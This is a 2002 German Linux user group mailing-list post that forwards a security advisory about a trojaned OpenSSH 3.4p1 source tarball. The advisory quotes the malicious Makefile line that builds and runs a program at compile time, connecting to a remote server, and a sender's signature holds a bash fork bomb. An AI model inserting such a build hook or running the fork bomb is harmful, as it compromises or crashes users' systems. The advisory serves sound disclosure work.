[PUG] Die groessten Deppen der Nation

Thu, 01 Aug 2002 06:35:34 -0700 

Jetzt kommts aber richtig dicke.

1) Webserver von OpenBSD.org geknackt
2) Trojanisches Pferd in OpenSSH eingebaut

Ich wette, da� Theo alles abstreiten wird.

-martin

> -----Original Message-----
> From: Mikael Olsson [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, August 01, 2002 1:21 PM
> To: [EMAIL PROTECTED]
> Subject: openssh-3.4p1.tar.gz distribution recently trojaned
> 
> 
> 
> From
> http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/
> freebsd-security
> 
> ----- Forwarded message from Edwin Groothuis <[EMAIL PROTECTED]> -----
> 
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: openssh-3.4p1.tar.gz trojaned
> 
> Greetings,
> 
> Just want to inform you that the OpenSSH package op ftp.openbsd.org
> (and probably all its mirrors now) it trojaned:
> 
>     
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4
p1.tar.gz

The OpenBSD people have been informed about it (via email to
[EMAIL PROTECTED] and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
[EMAIL PROTECTED]    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
----------------------------------------------------------------------------
PUG - Penguin User Group Wiesbaden - http://www.pug.org

Antwort per Email an